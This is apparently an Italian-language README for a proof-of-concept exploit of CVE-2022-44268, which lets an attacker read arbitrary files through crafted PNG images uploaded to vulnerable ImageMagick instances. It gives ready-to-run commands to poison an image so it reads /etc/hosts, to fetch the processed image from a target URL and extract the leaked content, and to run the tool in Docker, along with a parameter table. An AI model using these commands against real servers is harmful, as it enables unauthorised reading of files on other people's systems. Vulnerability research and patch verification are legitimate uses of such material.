
Proof-of-concept exploit per CVE-2022-44268 che consente la lettura arbitraria di file tramite immagini PNG manipolate caricate su istanze ImageMagick vulnerabili. Include supporto Docker ed estrazione basata su URL.
CVE-2022-44268 ImageMagick Lettura Arbitraria di File - Exploit Proof of Concept
Avvelena l'immagine ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Carica l'immagine PNG avvelenata.
Verifica se l'exploit ha avuto successo 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Build
docker build -t cve-2022-44268 .
Esegui
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Parametro | Descrizione | Tipo |
|---|---|---|
| --url | L'URL dell'immagine PNG caricata | String |
| --image | File PNG di input | File |
| --output | File PNG di output | File |
| --file-to-read | File da leggere dall'host vulnerabile | String |